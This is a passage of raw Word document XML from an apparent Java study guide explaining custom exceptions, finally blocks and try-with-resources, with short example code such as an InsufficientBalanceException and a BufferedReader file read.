      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A454E4"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212FBE">
          <v:rect id="_x0000_i1633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33599F72"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5510"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="5D42BC94" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1046B27B"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0339D8E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E234D" w:rsidRPr="00CE4B95" w14:paraId="5F89F832" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64496F7A"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aningful error messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704699D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your code more readable and understandable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="6479AEFA" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B037D7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main-specific handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF210C1"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separate business logic errors from system exceptions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="1F606D18" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B3A981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able &amp; maintainable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01EA94F0"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reused across multiple services/modules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="35D218F6" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5145E42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exception hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="014E59A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you classify and group exceptions cleanly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58145F2C"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166C4">
          <v:rect id="_x0000_i1634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093FD11"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reating a Checked Custom Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860461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sufficientBalanceException extends Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E0D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sufficientBalanceException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909520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essage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C9E8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7B50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BAF1D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the Custom Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCAD4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ankAccount {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF82E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ouble balance = 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D03FF" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350F3D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ithdraw(double amount) throws InsufficientBalanceException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A61FD3"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amount &gt; balance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F9E0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InsufficientBalanceException("Insufficient funds!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEF54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1439C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alance -= amount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9355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1728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145A6D"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401F67">
          <v:rect id="_x0000_i1635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDBAD9"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Custom Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D55F9F5"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validUserInputException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666338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validUserInputException(String msg) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CCA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sg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1E7D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4824A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B31D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is when you don't want to force the caller to handle the exception explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170EAC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01A716">
          <v:rect id="_x0000_i1636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECB1AF"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Time Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69600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otFoundException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0796404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OutOfStockException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2D3CDD"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alidTransactionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484A5EE"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DeniedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE656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ValidationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA7BCF" w14:textId="3570E83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37" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177933B" w14:textId="77777777" w:rsidR="00D72440" w:rsidRPr="00CE4B95" w:rsidRDefault="00D72440">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc197867432"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of finally block in exception handling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w14:paraId="51A1D212" w14:textId="11F4DAAF" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5"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in Java is an important part of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used to ensure that certain code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whether an exception occurs or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804E0D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79A68F">
          <v:rect id="_x0000_i1638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3386C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finally Block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C764B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is used to write </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cleanup code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11700FF6"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ing file streams or database connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321026C"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easing resources (e.g., sockets, threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466A998"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or final statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21852D8C"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7634A">
          <v:rect id="_x0000_i1639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D311B1F"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FEA1DC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385008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isky code that may throw exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607245C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1AECFF54"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110BE6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10A6C86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code — always runs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6963A52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C3EC2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A8CF39">
          <v:rect id="_x0000_i1640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46D72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1B9B8B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1CF0C0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7497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76A6A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rows ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38862A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0E0D6F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347C135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6FFACA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the finally block — always executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F62A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86E4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3C13F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D74AC4"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1D5C1F3E"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ught exception: / by zero  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72273F6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finally block — always executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9116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2802B">
          <v:rect id="_x0000_i1641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCE63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0979CC37"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>executes even if the exception is not caught</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C1ED8"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so runs </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if you return from the method inside try or catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057F52D"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won’t run</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only if the JVM shuts down (e.g., System.exit(0) or crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6965755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BCFE2">
          <v:rect id="_x0000_i1642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="745495E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1775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="6A996C73" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C088BD2"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EE8F8B1"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s finally block?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="0433D4AD" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AE262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exception thrown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79F9EE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607BEBAA" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5372A2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caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD1D8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37452DFB" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0CC4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not caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DD88A7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5155DC75" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7401D0D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in try/catch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B5E6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219322BC" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65F74DD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exit(0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7138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08B6904A" w14:textId="723ABA1F"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBF25A" w14:textId="77777777" w:rsidR="00890773" w:rsidRPr="00CE4B95" w:rsidRDefault="00890773">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc197867433"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a try with resources?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="7EF5F039" w14:textId="1AD5BB3D" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A5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Let’s talk about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 one of the coolest features introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 7</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automatic resource management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DA614"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6947E6">
          <v:rect id="_x0000_i1644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A93257"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ry-with-resources?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD35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special form of the try block used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically close resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like files, streams, DB connections) when the try block finishes — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no need for finally block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manually close them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA3BAD"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F82AEE">
          <v:rect id="_x0000_i1645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800158B"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6474A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ResourceType resource = new ResourceType()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F230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resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D610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50910A1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673CCA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21442C"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93C75A">
          <v:rect id="_x0000_i1646" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71411CD4"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ules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBF0D7"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source must implement the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AutoCloseable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface (or Closeable which extends it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015363D1"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sources are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically closed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the end of the try block — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no need for finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728F821"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7D6">
          <v:rect id="_x0000_i1647" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3F4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File Reading (Before Java 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D863C9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Reader br = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF521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198CD8C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br = new BufferedReader(new FileReader("file.txt"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6437E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C0B5C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220AD44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47FB0F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01B3EA0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E25547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br != null) br.close(); // manually closing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29268891"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x) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651EEBA"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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50403D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128A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00A4DF"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E2CE">
          <v:rect id="_x0000_i1648" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1C691"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Try-With-Resources (Java 7+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB94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BufferedReader br = new BufferedReader(new FileReader("file.txt"))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9D4D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58161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74559C6B"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35EAA1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AEDE9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Cleaner, less error-prone, and auto-closed! </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DF1DE"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FA5F1">
          <v:rect id="_x0000_i1649" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72548F29"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ultiple Resources Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31051C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2C35205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fr = new FileReader("input.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26D06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ufferedReader br = new BufferedReader(fr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2515994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48A5B9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18BA9D1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287CBA"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DF5BC">
          <v:rect id="_x0000_i1650" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45C6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368"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="6F7B817D" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
